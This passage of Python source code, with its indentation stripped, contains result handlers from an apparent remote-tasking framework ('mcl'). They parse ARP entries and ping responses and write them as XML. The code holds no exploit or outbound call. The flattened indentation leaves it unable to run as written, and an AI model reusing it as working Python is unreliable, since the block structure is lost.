output.EndWithStatus(input.GetStatus())
return True
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
initialResult = Result()
initialResult.Demarshal(msg)
moreData = initialResult.moreData
xml.Start('ArpEntries')
if initialResult.listType == RESULT_INITIAL_LIST:
xml.AddSubElement('ArpHeader')
_addArpEntry(xml, initialResult)
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
result = Result()
result.Demarshal(msg)
moreData = result.moreData
_addArpEntry(xml, result)
output.RecordXml(xml)
if moreData:
if initialResult.listType == RESULT_INITIAL_LIST:
output.GoToBackground()
output.End()
return True
output.SetTaskStatus(mcl.target.CALL_SUCCEEDED)
output.End()
return True
def DataHandlerMain(namespace, InputFilename, OutputFilename):
import mcl.imports
import mcl.data.Input
import mcl.data.Output
import mcl.msgtype
import mcl.status
import mcl.target
import mcl.object.Message
mcl.imports.ImportNamesWithNamespace(namespace, 'mca.network.cmd.ping',
globals())
input = mcl.data.Input.GetInput(InputFilename)
output = mcl.data.Output.StartOutput(OutputFilename, input)
output.Start('Ping', 'ping', [])
msg = mcl.object.Message.DemarshalMessage(input.GetData())
if input.GetStatus() != mcl.status.MCL_SUCCESS:
errorMsg = msg.FindMessage(mcl.object.Message.MSG_KEY_RESULT_ERROR)
moduleError = errorMsg.FindU32(
mcl.object.Message.MSG_KEY_RESULT_ERROR_MODULE)
osError = errorMsg.FindU32(mcl.object.Message.MSG_KEY_RESULT_ERROR_OS)
output.RecordModuleError(moduleError, osError, errorStrings)
output.EndWithStatus(input.GetStatus())
return True
from mcl.object.XmlOutput import XmlOutput
xml = XmlOutput()
xml.Start('PingResponse')
while msg.GetNumRetrieved() < msg.GetCount():
if mcl.CheckForStop():
output.EndWithStatus(mcl.target.CALL_FAILED)
return False
results = Result()
results.Demarshal(msg)
sub = xml.AddSubElement('Response')
sub.AddTimeElement('Elapsed', results.time)
sub.AddAttribute('length', '%u' % len(results.rawData))
if results.ttl != 0:
sub.AddAttribute('ttl', '%u' % results.ttl)
dataSub = sub.AddSubElement('Data')
dataSub.SetTextAsData(results.rawData)
sub.AddAddressIP('FromAddr', results.fromAddr)
sub.AddAddressIP('ToAddr', results.toAddr)
if results.type == REPLY_TYPE_REPLY:
sub.AddAttribute('type', 'REPLY')
elif results.type == REPLY_TYPE_DEST_UNREACH:
sub.AddAttribute('type', 'DESTINATION_UNREACHABLE')
else:
sub.AddAttribute('type', 'UNKNOWN')
output.RecordXml(xml)
output.EndWithStatus(mcl.target.CALL_SUCCEEDED)
return True
